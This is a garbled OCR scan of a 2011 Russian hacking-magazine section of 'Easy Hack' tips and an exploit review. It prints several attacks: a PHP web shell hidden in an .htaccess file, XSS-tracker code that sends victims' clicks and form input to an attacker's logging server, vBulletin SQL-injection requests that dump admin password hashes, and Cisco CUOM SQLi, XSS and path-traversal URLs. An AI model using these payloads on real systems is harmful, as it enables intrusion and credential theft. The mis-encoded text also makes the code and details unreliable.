ма ееаа В Но лает) агент 


РМойн- Сл ткй сичгекей НН соетсй ва Мга 
а ас Вей Но бовбь Я пля 
Юозкль, КАИ, Велебкр, с БНысдснит 
Бен Иа: ВЕ, и Рог ибо ВР п 
Ш т 


Тоту "Альфоонени ПОроая Фиеие «няни 1 
Зирроиье ст Ди Ььая Ыновнной ЦАЙгафонние ЭООЙ) 


| = Ге | 


Запрещаем пользователям доступ к ста.ехе и к ба+- 
файлам 


ста-скрипты. Конечно, ограничение так себе — 6$ и аналоги 
запускать все равно можно. Но вернемся к обходу ограничения. 
Действует оно на ОС до \\Ипдом/$ ХР включительно. 

Фича втом, что в данных ОС кроме командной строки спп4.ехе есть 
еще и сопптапа.сот. Последняя— это урезанная ОО$-консоль, 
оставленная для обратной совместимости, и она имеет очень 
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ограниченный функционал. Теперь самое интересное: запустить 
сопгптапд.сот мы можем, но запускать хоть сколько-нибудь зна- 
чимые команды (1рсопЯд, например) возможности нет — отобра- 
жается все то же ограничение на запуск консоли. Зато мы можем 
запустить встроенную команду, типа смены директории «са». И в 
итоге, следующая комбинация будет работать нормально: 


са | 1рсопйв 
Точно описать причинно-следственную связь такого поведения, 


почему оно работает, я не могу. Но подведу итог: ААА! Это просто 
умора :]. 


ЗАДАЧА: ПРОВЕРИТЬ НТТР$ НА 
ДЫРЯВОСТЬ. 


РЕШЕНИЕ: 


Одна из проблем протокола НТТР — отсутствие шифрованиятрафика 

и проверки целостности данных, то есть присутствует возможность 
проводить атаки Мап-т-Фе-пуиаае. Все данные передаются открытым 
текстом, а это, согласись, совсем не круто. НТТР5 — расширение прото- 
кола НТТР, поддерживающее шифрование за счет использования 551/ 
ТЕ$-криптопротокола. В $51 используется асимметричный алгоритм с 
открытым ключом. В лучшем случае получается, что данные шифруются, 
аклиентудостоверяется, что сервер — это именнотот сервер. Но какни 
странно, НТТРЪ — не панацея. Здесьтоже есть свои дырки, особенно в 
первой версии протокола. Сразу вспоминаются проблемы с самоподпи- 
санными сертификатами и успешные атаки хакеров на корневые центры 
сертификации. В итоге, в определенных ситуациях можно перехвачен- 
ный трафик расшифровать, но что более актуально — провести пресло- 
вутый МИМ. Вообще — тема интересная! Но ладно, яо другом. НТТР5 

— вещь специфическая, и если тебе необходимо проверить сервер не 
вникая втонкости, то можно поручить это дело одному меб-сервису — 
млллл/.55Цабз.сопл/5$196/апа(уте.В\{п1(. Данный ресурс отлично справля- 
ется со своей задачей: проверяет сертификат, настройки шифрования, 
выводитоценку в соответствии со стандартом, дает ссылки с примерами 
атак на выявленные прорехи. Так что почекай сервер своего интернет- 
банка и напиши им гневное письмо отом, что они не заботятся о своих 
клиентах! Если что-то нетак, конечно :]). 


ЗАДАЧА: РАСШИФРОВАТЬ НТТР5-ТРАФИК. 


РЕШЕНИЕ: 


И в продолжение предыдущей задачи— пример жизненный. 

Против админа была проведена агр-зроойпд-атака и украден 
НТТР$-трафик общения его с сервером, если точнее— авторизация. 
Конечно, правильнее было бы сразу провести МИМ и подменить 
сервер своим сервером, особенно сучетом того, что на сервере 

был самоподписанный сертификат (что, в общем-то, обычно для 
локальных сеток}, но как-то не срослось :). В итоге был кусок НТТР5- 
трафика, расшифровать который простотак не представляется воз- 
можным. Хотя... при плохом шифровании и использовании облачных 
вычислений :)... Но это уже частности. В общем, использую другую 
уязвимость и житейскую хитрость. Был украден закрытый ключс 
сервера и сохранен локально в файлик [а-[а-[а.Кеу. Что дальше? От- 
крываем \\гезВагк: 


1) Открываем отсниффанный НТТР$-трафик; 
2) Меню ЕЧ1* -> Ргефегепсе$; 
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ГЕ: СТАС СА оу ег 2 Мсотилинал 9 СОГИ 


МзскосогЕ<Н2 Мзп4Чоы= [00% я 
С СоруезуйЕ МазскносоЁЕ Сокр 1990-2001. 


С =. ВОСУНЕ” 1 ТЕЗТ > треопЕ 19 


Те соглап@ ркеопрЕ Лаз Бееп 9152616 Бу усие адатплаеЕваеок. 
Реза лапу Кеу Ео сопЕллие . . 


С:`ФОСУНЕ”“^ТЕЗТ ей |! 


Вай соплап ог 11 


рее 19 
папе 


С: ОСОНМЕ-1УТЕЗТ2сЯ | зрсопР 19 


Изо ПР СопЕтдиеаелойп 


фенегпеЕ афарсеюе фоса{ Ягеа Соппеселоп: 
Соппесетоп- рес : Леса 1Чега п 
ТР Наагеа. вве сс“ 112.168 .138.128 
ЗибпеЕ ЭаеК - казана аа & 255.255 .255. 
ГеГац1Е Саеенау . : 192.168 .138.2 


НЗ БыЕЕтх 


С =. БОСОНЕ“ 1 ТЕЗТ» 


Обход запрета — очень просто 


зититагу 


Сене О 
пени , 
мес ОИ . 


я . 


Сего 


Тене зодачнь вт ера риену вл Пе ЗЕ багиаг Рабсыо Сниде 200. 


Ты вагмчег Не мобенесаь о во ЗГТ иное ь Беневива: коррозии еня Гиеоно оо сч 


бета 


Сергиев |пГезгиецыНой 
Сопот: РУБГте 


АБетцИ ле пагеннь 


Рге\х Напа Мор авы ПО ое рееорариты" КАНРРАТИЕ 

МН Гевиь АЯ АЯ 12 19:3523 ИТС 2009 

ВИНЫ ить Ва Аа ТО 1815-23 ЦТО 2018 пакриея | @ уве вто 1 по 
Кар РВД! 1024 В 

Яирлайшгю анруеныт МОлегАНАЖА НЕХ 

Зегиег ео Сгуроогарму — М 

Ани Бе [Саба На 


ивиег — 2 РМ 2ТГ-аТИЕ 


Своем ананас] 1 (ЕВ вла 


Е] Мапа 
маша Туре МАЕ шла 
Дечеса от ЫНоглла ся Мопе 


ТризеЯ Мо ТЫЕЕСАИЕ [мет 


НПР5 на моем серваке мало чего стоит :} 


Бы р уе ба Синыт  Баыуые ина Темрьеку Теа Нее 

ыы сахкеаа соот Оы ааа ак я 
Га иреИ о | | ыы_ = СЫ АЕ 

ыы сы ры 


ТЫриЕ 


вы. Тита Зенне 
пни пит: р вжаа Бы: иеиаьны т: = 
То 3. ТОЖЕ эре-саЕЧют Баев 


АБЕТЕИЕТ 
НЫ] 
При а пы ор 

Чек "5 Тя Байны: Пану 
ИТ 
"Бррёг вт Ре ы 
тис Ририии т * 
Селтик ПАГ * 
ЧС обнесен # 


ыы Часы ЧС еще И: 


2 Кава 70: 688 Бута о ыЧга СЗ080 БЕ), 62 Бузиа сарае СИ обес БЫ. Упньвея 

а о и В Е ры 

т Рогтт бт ЦТ: |, СЕТ РОГТТ ЕТ Ш Баны 

Е Ай 
т 


1 
я Гали Воть сатогое ВгСсьсЮ 
По 


ЗН Т. цима ЗЕ 


3000 02 30 38 №1 ба 12 ей ба 2048 № 26 58 0041 50 смыг.. ка. 
вор 01 Фа 64 18 42 02 №0 5 50 00 ба ба та © 90а ба са, =! 
0020 04 19 19 63 01 БЫ 1 72 ва 21 ва Ша 1 № 1..4... 
ВоВе 40 28 МЫ Га 05 96 17 01 91 6 40 9 24 г Мань оф. 


Расшифровываем НТР5-трафик 


3) В списке Ргофосо1$ находим $551 (вводя буквы); 
4) В В$А Кеу 1151 пишем через запятую: 

5) ТР-адрес сервера, порт, протокол, путь к ключу 
192.168.0.100,443, 552, с:\]а-]а-1а.Кеу; 

6) АррТу. 
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ЗАДАЧА: 
ОПРЕДЕЛИТЬ ОБНОВЛЕНИЕ М$ $01. 


РЕШЕНИЕ: 

Наверное, нет смысла говорить отом, что сбор информации о 
сервере/сервисе— вещь чрезвычайно важная при взломе. Получив 
точный номер версии, мы можем посмотретьуязвимости продукта, 
возможно— нарыть паблик-эксплоиты. Для М$ 5ОЕ получить точный 
номер, включая номер билда, — не проблема. Через 5 ЧЁ -запрос: 


5е1ес* @@\ег$1оп 
Или Мтар`ом: 


№тар -$\ -р1433 <фагвеф$> 


Но интересное далее. На млм. з9{еагт.сого/агис(е/5а[-зегмег-уег®!оп$ 
(и аналогичных сайтах} добрые люди ведут сопоставление между 


конкретными версиями М5 51 и номерами обновлений для него от 
М5. Что приятно— указаны и даты выпуска обновлений, и линки на 
них. Гак что мы сразу можем понять, обновляется ли сервер, и посмо- 
треть баги, исправленные в следующих патчах. 


ЗАДАЧА: ЗАЛИТЬ И СПРЯТАТЬ ВЕБ-ШЕЛЛ 
НА СЕРВЕРЕ. 


РЕШЕНИЕ: 


Решение данной задачи основано на посте в блоге, автор которого— 
Е\Чаг Магсиззеп [6 и. у/пло71 уп]. В нем он поделился опытом о тестиро- 
вании какой-то СМ$'ки, в которой предложил прятать шелл в стандарт- 
ном для АрасПе файле— „№{ассез$. Сама идея не особо нова и не особо 
юзабельна, но что-то в ней определенно есть, ее стоит держать где-то в 
уме, на полочке. 

Напомню, .Р{ассе$$— это файл дополнительной конфигурации 
веб-сервера Арасве. Он является подобием ВИра.сопЁ стой раз- 
ницей, что действует только на каталог, в котором располагается, и 
на его дочерние каталоги. Возможность использования .Р{ассе$$ 

в том или ином каталоге указывается в ВИра.соп{ [директива 
АЦом/Оуегг!е). 

Таким образом, получается, что закачав .ассе$$ на сервер, мы можем 
изменить настройки. Крометого, .ассе$$ является неплохим местом 
для того, чтобы спрятать меб -шелл отглаз людских, потому как он в 
основном воспринимается как что-то системное, необходимое. Нуа 
теперь практический пример: 


0 ЗАДАЧА ПОЛУЧИТЬ МАКСИМУМ ЧЕРЕЗ 
Х$5-УЯЗВИМОСТЬ. 


РЕШЕНИЕ: 


Х$5— одна из самых распространенных сейчасуязвимостей на веб- 
сайтах. По теории, Х5$-бывают двух видов: 

® {огед/активная Х55— та, которая хранится на сервере и запускается 
сразу при открытии жертвой страницы; 

® геНецед/пассивная Х55— не хранится на сервере и требуетот 
пользователя перехода по специально сформированной ссылке, код в 
которой и будет исполнен. 

Второй вид очень часто не воспринимается людьми как опасный. 
Дескать, пользователь сам дурак, что перешел по кривой ссылке. И 
очень зря, ведь Х5$ можно скрыть с помощью сервисов по свертыва- 


> ОДО 


Г ея инт 
Гонт вины [ож 
рана 


9. 00.5000 5000. _| За 5егуег 2005 ЗРЯ [17 оес 2010 Фес 2010 


9.00.4317 21 Реь 2011 


9.00.4315 20 бес 2010 


Сопоставление номера версии МФ $54! и патчей от про- 
изводителя 


< Фе$ > “^\. ВЕ 
Огаег а11ом,аепу 
А11ом гот а11 
</Е11е$> 
АааТуре арр11са*1оп/х-ПЕра-рИр .ПЪФассе$$ 


НННН <?рИр еспо "\п";ура$5%Вги($_бЕТ["с']." 2>81"); ?> #НННН 


Итак, пояснения. Первый блок используется для перезаписи де- 
фолтного правила, запрещающего доступ к.№ассез$ из веба. Далее 
определяем .М{ассес$ как файл, который исполняется как рйр-скрипт. 
И последнее— в комментариях спрятан простейший рЮр-шный шелл- 
код, который выполняет в системе команду, полученную в параметре 

‘с’ свыводом всех данных обратно в браузер. Запускаем команды 
следующим образом: НЕр: //м1сЕ1т. сот/раЕН/ .Н{ассе$$?с=сомтапа. 
Каквидишь-— все просто. АрасПе воспринимает этот файл как 
обычный .{ассе$, а рпр вырываеттолько нужный ему кусок. ЕЧаг 
Магсизсеп на этом не остановился, расширил сам шелл и продолжил 
изыскания новых векторов атак, связанных с файлами настроек Апача. 
Более подробную информацию можно прочитать здесь— БиДуДВНИМ?, 
а скачать здесь— Б\.УЛи9 Сиб. 


нию ссылок, но более интересная идея описана дальше. Обычно всех 
пугают раскрытием данных из кукисов, которые чаще всего содержат 
идентификатор сессии иеще какую-нить конфиденциальную инфор- 
мацию: <5сг1р>а1ег* (доситеп* .соокК1е); </зсг1р*>. Как понятно, 
вместо отображения кукисов, злобные взломщики перенаправляютэти 
данные ксебе на сервер. В результате у них появляется возможность 
зайти на какой-то ресурс, используя данные кукисов под пользова- 
телем, у которого эти кукисы были украдены. Как ни странно, вполне 
адекватная защита от этого есть — флаг НИрОпу, который указываетна 
запрет чтения/записи данных СооКе посредством /ауа5 стр, отсюда и 
название: кукисы доступны только через протокол НТТР. Получается, что 
атакующий уже не можетукрасть данных. Казалось бы Х$5 могпотерять 
актуальность, однако есть несколько обходов этого ограничения. 

По сути своей, чтобы вполне осознать серьезность Х$5-уязвимостей, 
важно понять, что, используя возможности яваскрипта, мы можем 


ХАКЕР 08 /151/ 2011 


сделать почти все что захотим. В качестве примерая хочу предста- 
вить нашего польского соратника по цеху— Кшиштофа Котовича и его 
творение сназванием Х55-{гасКег: БИ.у/9 77168. Суть идеи заклю- 
чается в том, чтобы используя возможности яваскрипт, следить за 
действиями пользователя на всем сайте и при необходимости сграбить 
ценные данные с просматриваемых страниц, либо выполнить какие-то 
команды вместо пользователя. Но как это сделать? Ведь Х5$5 обычно 
находится на одной конкретной странице. А мы хотим следить за поль- 
зователем по всему сайту. Как же это сделать? Кшиштоф предложил ис- 


пользовать для этого развернутый на весь экран фрейм, куда поместить 


контент с настоящего сайта. В результате пользователь будет ползать 
уже внутри Нгате, при этом фактически не покидая страницу, где на- 
ходится Х55. Вредоносный яваскриптпри этом продолжает работу и 
имеет полный доступ ко всему, что находится внутри Игате. Причем 
таккак дырка находится на самом сайте и фрэйм оттуда же, то кросс- 
доменная политика никак не ограничиваетяваскрипт. Надеюсь, чтоу 
меня получилось понятно объяснить суть идеи. Если нет, то попракти- 
ковавшись на тестовом сайте о". УЛЕТУОХ, ты все поймешь. 

Не могу сказать, что поляк открыл что-то неведанное, отаком подходе 
многие думали, но он сделал качественную реализацию, собрав все 
воедино. Пока в Х55-{гасКег реализован мониторинг ввода данных и 
перехват файлов. На практике все реализовано на базе библиотеки 
|чцегу и выглядит следующим образом. Сначала прячется сам фрэйм 
и подгружается исходная страницу: 


$('Боау').сН11агеп().В1ае(); 
$('<1Ргате>') 
.С55({ ро$11оп: 'аб5о1и%е', ман: '1900%', пезей*: '100%', 
фор: @, 1е+Е: 9, Богаег: @, БасКквгоипа: ‘+++’ }) 
„аеег(' гс", 'ПЕЁр: //ехатр1е.сот').аррепаТо( 'Боау'); 


Доступ квнутренним элементам мы получаем каждый раз при об- 
новлении фрейма, то есть при любом переходе пользователя внутри 
фрэйма. 


$('<1Ргате>').1оаа(РипсЕ1оп() { 
{р1$.сопепЕИ1паом; {015.сопепЕВоситепт*; 


}); 


Мониторинг переходов по всем ссылкам и ввод форм. 


$('Боау' , №15. сопжепЕОБоситеп* ) 
.Впа('а’) 
ос ттСКРИИСЕТОй({ 
1о5({еуеп*: 'с11ск", 'Ёгот': 1оса1оп, 'Пге+': %И1$.Вге+, 
'Хагрее': {015.%агре*}); 
}) 
.епа() 
„Виа ("Фогт') 
„ зибтт (РипсЕтоп() { 
10о5({еуеп®: 'зибт1{', 
+гот: Тоса1оп, 
ас1оп: $(%01$).а%г('ас%1оп') || ТосаЕ1оп, 
бе1а$: $(1015).5ег1а117е() 


}); 


}) 
.епа(); 


Аналогичным образом, используя селекторы |@чегу, мы можем об- 
ратиться клюбому элементу внутри страницы. Селектор— это что-то 
вроде описания элемента, к которому обращаешься. Причем селек- 
торы можно задавать в своего рода регекспах. Если интересно, очень 
показательно все описано на сайте ар'.;ачегу. согп/са{едогу/з{ес{огз. 
Например, используя следующий селектор, мы находим поле вводас 
именем раз$\/ога и выводим его значение алертом на экран: а1ег* ( 
$('1при* [папе | ="раз$мога"]').\ма1());.Нуи система логирования 
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УитегаЫе раде 


<>ю9$ 
| 


герог$ 


ВПаск$ 


ра$$\/ога 


Логика работы Х$5-каскега — все внутри ате 


всех украденных данных находится на любом стороннем сайте. Дан- 
ные отправляются через СЕТ-запрос: 


ФипсЕ1оп 108 (мпа{) { 
ипа* ["_"] = МаеН . гапдот( ); 
СГУ 
$.вефе(1о20г1, мпа*); 

} саеси (е) { 
\уаг 1 = пем Тмаре(); 
1.5гс = 1051Г1 + "?" + епсодеуВТСотропеп* ($ .рагат(мпа{)); 
$(1).1оаа(РипсЕ1оп() {$(4115) .гетоуе();}).аррепаТо("Боау"); 


} 
}; 


Остальные фичи и возможности ищи на сайте автора. В общем, идея 
хороша, и над реализацией автор тоже потрудился на славу. Ёму спа- 
сибо :]. Теперь о минусах и тонкостях. 

1. Данная реализация из-за Х5$-фильтра не работает в |Е8 и СПготе. 
2. Против данной технологии ([Х55+Игапе) используются методы за- 
щиты— Нате Би$Ипд. Это специальные яваскрипты, уничтожающие 
фреймы. Но это все тоже можно обойти :}. 

3. При открытии в фрейме другого сайта, мы уже не можем просматри- 
вать внутренности из-за кросс-доменных политик. 

В общем, тема очень большая и не совсем подходит к формату этой 
рубрики. Странно, что никто из авторов журнала, более прошаренных в 
меб-безопасности, чем я, еще не писал об этом :). 

И под конецеще один небольшой пример, чтобы еще больше напугать 
всех. Следующую атакуудалось провернуть мне с Алексеем Синцовым. 
Есть сайт А, на котором есть Х$$5-уязвимость. Есть пользователь, 
который залогинен на сайте А. Куки защищены НИрОпу + рандомный 
идентификатор в самом НТМ!-коде. Была реализована следующая 
атака. Пользователь зашел на сайт Б, который принадлежит злоу- 
мышленнику. На этом сайте в скрытом фрейме подгрузился сайтАс 
запуском Х55-уязвимости. Данная уязвимость запустила Х5$-{гаскег 
то естьеще один фрэйм с сайтом А. Докрученный Х55-{гаскегвынул из 
кода рандомный идентификатор и сучетом того, что куки с браузером 
жертвы посылаются автоматом, смогвыполнить команду отимени 
жертвы. Получился такой злой Х55+СЪКЕ. В результате даже впари- 
вать кривую ссылку пользователю не надо. 

Р5. Хотелось бы поблагодарить Дмитрия Евдокимоваака 0191 [ре- 
дактора раздела софта 5есигйу нашего О\О)] за помощь, оказанную в 
подготовке материалов в эту рубрику :]). 

Р$2. В продолжениетемы о наполнении себя знаниями— приходи на 
встречи ВеКоп-Кизз!а М/^ллм.детсоп-гизз1а.ги]. э= 


> 041 


ЕХРЕОП$ 
ВЕМЕМ 


м му Гут! Че. (одзро{. сот) 
р!КоЁагад (115612, дер. Красная звездочка, д.1) 


ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОТ5 
ВЕМЕМ 


ЕХРЕОП$ 


КЕМТЕМ ЕХР 0$ 


ВЕМЕМУ 


ОБ50Р 


ЭКСПЛОИТОВ 


ЕХРЕОП$ 
ВЕМЕМУ 


ЕХРЕОП$ 
ВЕМЕ\У 


ЕХРЕОП$ 
ВЕМЕМУ 


ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОП$ 
ВЕМЕМ 


Разбираем 
свежие 
уязвимости 


Минувший месяц был достаточно богат на публикации разно- 
образных эксплоитов, в особенности для веб-приложений: Лоопа, 
уВиЦе{т и \МогаРге$$ стабильно показывают хорошие (а для кого- 
то и плохие) позиции в чартах. Все их разобрать в обзоре, увы, не 
выйдет, но самые интересные уже ждут тебя! 


0 1 ыы В УВОЦЕТМ 4.0.Х => 


С\55\2 
7.5 (АМ: М/АС:УАц:М/С:РЛ:Р/А:Р] 


ВЕЕР 


уВиЦейп — один из самых распространенных форумных движков, ас 
недавних порещеи СМ$ [МУВиЦенп Руб И$Рипд зиКе], в простонародье 
— булка. Немецкий исследователь под псевдонимом /ОВп.ХЗгуже не 
в первый раз находит багу в этом движке, и в этот раз к поискам его 


подтолкнуло очередное обновление безопасности, в котором исправ- 


лялись некоторые критические уязвимости. Такой метод обратного 
инжиниринга патчей широко используется исследователями для 
выявления багов как в обычных скриптах, таки в бинарных файлах. В 
этом случае требуется лишь просмотреть изменения, которые вносит 
патч, и сделать соответствующие выводы. Таким образом, область 
поиска существенно сокращается. 


Взор багоискателя пал на два файла. Первым из них был /МЬ/зеагсв/ 
еагс{00[5.рПр и конкретно функция де{15р(ау5то: 


риуб11с зФаЕ1с РипсЕ1оп ве015р]ау5г1п8 (фа Те, 
$Еаб1е_41$р1ау, $ФНе1апате, $Кеу, $14, $сотрагафог, $15_аа*е) 
й 
21ора1 $уби11е1т, $у6рИга$е; 
фпате$ = аггау(); 


1+ (15_аггау($1а)) 


{ 
$5491 = "ЗЕЁЕСТ ОТЗТТМСТ $+аб1е .$Яе1апате гот". 


› 042 


ТАВЕЕ_РКЕЕТХ . 
"фЕаб1е Аз $Фаб1е ИНЕВЕ $Кеу ТМ (". 1ир1оде(', ', $14) .")"; 
1+ ($г$* = $уби11еЕ1т->а6->адчегу_геаа($$91)) 
{ 
ий11е($гом = $уБи11е1п->а6->+ефсп_гом($г$*)) 
{ 
фпате$[ ] = $гом[ 9]; 
} 
} 


1+ (соип*($патез) > 9) 
{ 
гефигп $Еаб1е_415р1ау . ': 
} 
} 
е15е 
{ 
//Т1+ ме во* Пеге, ме Вауе а $1п81е уа1ие 
1+ ($гом = $уби11е1т->а6->аицегу_Яг$*( 
"ЗЕЕЕСТ $+каб1е.$ве1апате гот "_. ТАВЕЕ_РВЕЕТХ . 
"$Еаб1е Аз $Еаб1е ИНЕКЕ $Кеу = $1а")) 


{ 
гефигп $%аб1е_415р1ау .'' 


'. 1р1о4е(', ', $патез); 


е1+: : ве Сотрагег1пв ($сотрага*ог, $1$_4а*е) 
.''.. Фгом[ 9]; 
} 
} 


гесири *^. 


} 


Интерес для нас в этой функции представляет переменная $14, которая 
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ЕХРЕОП$ 
ВЕМЕМ 


Т5 


ЕХРЕОИ$ 


ЕХРЕОТ$ 


ВЕМЕ\У 


ЕХРЕОЬ 


ЕХРЕОП$ 


РЕ Р-ТАЕ 


С$со подтверждает, что облажалась 


никакв ней не фильтруется. Теперь посмотрим, где используется эта 
уязвимая функция, и обнаружим файл /расКаде®/МЬюгиг/жеагсНЛуре/ 
5оса[агоир.рйр, строки 201-203: 


УВ_5еагсй_беагсИТоо1$ : : 2е{015р1ау5г1п8( 
'5ос1а1егоирсаегогу' , $у6рН газе [ 'сафевог1е$ '], 
'{1Е]е', '5ос1а]1егоирса*евогу1а', 
фуа1ие, уВ_5еагсп_Соге: :ОР_ЕО, %гие )); 


Истина где-то рядом. Как действовать дальше? Из параметров 
функции становится ясно, что вызов связан с поиском по неким 
«5оста[ дгочрз». В ходе экспериментов рекомендуется использовать 
[уе НТТР Неадег$ — плагин для ЕигеТох, так как нам придется ра- 
ботать с параметрами в РОЗТ-запросах. Так как исходная функция 
явно используется при поиске, то подвергнем экзекуции страницу 
поиска зеагсй.рйр. Перейдем по ссылке «Зеагсв Ми р[е Сощегп( 
Туре» и отметим галочку напротив «дгоирз», а в строку поиска 
введем название какой-нибудь существующей группы или ее часть, 
например, {еат. Воттакой РОЗТ-запрос при этом получится: 


фурей58%50=7&ацегу={еат&{1{1еоп1у=1&5еагсПизег=&ех 
ас{пате=1&{а5=&4о5еагсй=5еагсй+Мом&5еагспаа{е=@&Бефтогеа+ег=а 
ЕЕег&5огЕБу=ге1еуапсевогаег=ае5сеп91п&5ауерге{$=1&$=&5есиг1{ 
усокеп=1302542927-44с+038925+166а6869е06068374651371+1с9е@&ао 
=ргосе$$&5еагсИ{Пгеаа1а= 


Для эксплуатации уязвимости дополним исходный запрос 5 Ц - 
инъекцией: 


фурей58%50=7&ацегу={еат&{1{1еоп1у=1&5еагсПизег=&ех 
ас{пате=1&{а=&4озеагсй=5еагсй+Мом&5еагспЧа{е=@&Бефтогеа+ег=а 
ЕЕег&5огЕбу=ге1еуапсевогдег=аезсеп@1п2&5ауерге{=1&$= 
&5есиг1фуфоКеп=1302542927-44с+038925+166а6869е060683746513 
71+1с9ед&ао=ргосе55&5еагсп{ПгеаЧ149=8са* [9 ]=1) УМТОМ $ЕТЕСТ 
'Вахпах" # 


Бинго! В содержимом страницы появилась наша инъектируемая строка 
Рахрах. Едем дальше: модифицируем запростак, чтобы вывести логин, 
хэш, сольи мэйл админа 


фурей58%50=7&ацегу={еат&{1{1еоп1у=1&5еагспизег=&ех 
ас{пате=1&{а5=&4озеагсй=5еагсй+Мом&5еагспЧафе=@&Бефтогеа+ег=а 
ЕЕег&5огЕбу=ге1еуапсевогадег=ае5сепд1п2&5ауерге{$=1&$= 
&5есиг1фуфоКеп=1302542927-44с+038925+166а6869е0606837а 
651371+1с9ед&ао=ргосе$$&5еагсН{Пгеаа14=&са*[9]=1) ИМТОМ 
ЗЕЁЕСТ сопса*_ м5 (9хЗа ‚ изегпате , раз$мога , °а1{ , ета11) ЕВОМ 
Би11ее1пижег 11114 1,1# 


Далее осталось лишь подобрать пароль любыми подручными сред- 
ствами, будьто /ойп ТВе К!ррег, Раз$\м/огазРго или какой-нибудь 
онлайновый сервис, коих нынче развелось в достатке. 


® УВиЦет РибИ$В тд бике 4.0.0 — 4.1.2 
® \ВиЦеп Гогим С[Га$$1с 4.0.0 — 4.1.2 
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ЕХРЕОП$ 
ВЕМЕМ 


ОШУТЮМ 

Обновить движок до более поздней версии или установить патч. 
Еще существует метод патчинга вручную, который заключается в 
том, что переменная $14 оборачивается в вызов специальной функ- 
ции, фильтрующей нежелательные значения: 


$14 = $уби11е1п->а6->$41_ргераге($1а); 
1+ (15$_аггау($1а)) 
| 


Но это еще не все. Так как переменная $!4 может быть массивом 
переменных, нужно добавить в функцию $91 _ргераге(} обработку 
этого случая (по умолчанию еготам, как ни странно, нет). Конечный 
вариант выглядиттак: 


фипсЕтоп $41 _ргераге ($уа1ие) 
{ 
1+ (15_5%г1пв ($уаше)) 
й 
гефигп 
} 
е15е 1+ (1$_питмег1с($уа1ие) АМО $уа1ие + 9 == 
у 
гефигп $фуа1ие; 
} 
е15е 1+ (1$_Боо1 ($уа1ие)) 
{ 
гефигп Ффуа1ие ? 1:0; 
} 
е15е 1+ (1$_пи11($уа1ие)) 
{ 
гефигий ии - 
} 
е1е 1+ (1$_аггау($уа1ие)) 
{ 
фогеасй ($уа1че аз $Кеу => $1%ет) 


| 


. $ЕН15->е5саре_$%г1п?($уа1ие) . | 


фуа1ие) 


фуа1ие[ $Кеу] = $%11$->$541_ргераге ($1%ет); 
} 


гефигп Ффуа1ие; 


} 


е]е 


| 


гефигп 
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7.5 (АМ: М/АС: /Ац:М/С:РЛ:Р/А:Р] 


|ВРЕЕ 


С!15со ЧпШед Орега{оп$ Мападег (СиОМ) — комплексное решение 
от известного вендора, предназначенное для мониторинга состоя- 


. $4015->е5саре_ $%г1п8($уа1ие) . - 


МНОЖЕСТВЕННЫЕ УЯЗВИМОСТИ В 
СОСО а ОРЕКАПОМ$ МАМАСЕК 


ния сети и оперативного решения возникающих проблем. Решение 
это оказалось на удивление дырявым. В середине мая исследова- 
тели из 5епзе о 5есигцу опубликовали целый вагон уязвимостей в 
этом ПО: здесь и слепые 5@[-инъекции, и межсайтовый скриптинг, 
и выход за корневую директорию веб-сервера. Традиционно, в 
случае множественных уязвимостей счетчик С\/55 определяется 
по самой серьезной из них, в данном случае это 59| -инъекция, и 
поэтому наш экспонат заработал '/,5 баллов из 10. 


› 043 


ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОП$ 
ВЕМЕМ 


ТЕ Ч 
И аъ и пнннт 5 


ВР салатам 


я тети т у Гра це фам реб гие саит = [СНЫ 
а РА нуепиЕ 
и 


Сневнона 


р О 
ги 


1. Переменная ССМ$ в скрипте РКТез{Сгеайоп.до подвержена слепой 


5ЯЕ-инъекции, которую можно продемонстрировать банальной одинар- 


ной кавычкой: 


/1рет/РВТез{Сгеа1оп.4о?Ведие5оигсе=да$ПБоага8МАС$=&ССМ$= 
'иа1{+Р0г%204е1ау'0:0:20' --&Ех{п$=&ТР$= 


Аналогичной уязвимости подвержена переменная сст в скрипте 
ТееРгезепсеКеро“Асвоп.адо: 


/1рет/Те1еРгезепсеКерог*Ас*1оп .ао?сст= 'ма1{ог%20 
Де]ау'0:0:20' -- 


2. Пассивные Х$5$ были обнаружены в большом количестве скриптов 
приложения Соттоп 5егмсе$ Шемсе Сег{ег, вотлишь некоторые из 
НИХ: 


/1рет/ ад\уапсеаЯпа . до?ехп=73+с6< /5сг1ре><5сг1рЕ>а1ег*(1) 
</5сг1рф>23+6е43447/1рет/1051са1Торо.ао?с1и${егМате= 
964с1"%ЗБа1ег*(1)//4031са+63а7 


Полный список уязвимых скриптов находится в адвизори 505-11- 
006, которая в свободном доступе обитает в интернете. Не уда- 
лось утаить баги и приложению под названием Согпгтоп 5еглсе$ 
Егагпемиогк Нер Зег\ЕТ, в котором тоже была обнаружена пассив- 
ная Х55: 


/ смпр/аем1се . сепфег.4о?4еу1се=&72а9+" ><5сг1рЕ>а1ег*(1)</ 
$сг1рт>5+5251ааа=1 


3. Продолжает наш хит-парад веб-приложение С!5со\\!огК$ 
Нотераде, которое порадует нас возможностью выхода за предель 
корневой директории веб-сервера, благодаря чему становится воз- 
можным читать произвольные файлы в системе. Ниже представлень 
наиболее интересные случаи, содержащие настройки баз данныхи 
логи изменения паролей: 


® ПЕЁр: //Фагоет: 1741 /сипр/аца11о2.ао?81е=..\..\..\..\..\..\.. 
АОООЕ. Шт 

® ПЕБр: //Фагоет: 1741 /сипр/аца11о=.4о?81е=..\..\..\..\..\..\.. 
\Ргоёгат Е11е5\С$СОрх\МОС\Тотса*\мебарр$ \{г1\уеп1\ИЕВ-ТМЕ\ 
с1а55е5\зспеди]е .ргорег*1е$ 

® ПЕЕр: //Фагоех: 1741 /сипр/аца11о2.ао?81е=..\..\..\..\..\..\.. 
\Ргозгат Е11е5\С$СОрх\116\с1а55раИ\сот\с1$со\пт\ст+\ 
а65ег\у1се2\ОВ5$егуег .ргорег1е$ 

» ПЕр: //Фагоет: 1741 /сиупр/аца11о2.4о?А1е=..\..\..\..\..\..\.. 
\Ргоёгат Е11е5\С$СОрх\1о5\АбрмаСПапее. 105 
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Перезапись освобожденного объекта значением 0с0с0сОс 


ЕХРЕОП$ 
ВЕМЕ\У 


Уязвимая страница поиска УВИЙейп 


принт ег СЕРР ОВЕНИС „герое Аы НЫ АН ВИ 
Удрегысьскее  РЩь — Ив 
Г шем рРЕБЕЕо. 


ЗОШИТОМ 
Нужно обновить СиОМ до версии 8.6 или более поздней. Либо можно на- 
катить патчи от С!5со, которые можно обнаружить на страницах, посвя- 
щенных соответствующим багам: С5С{п61'716, С5(Сто12704, С5Цо12712 
ИСЗ. 
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С\5$\2 
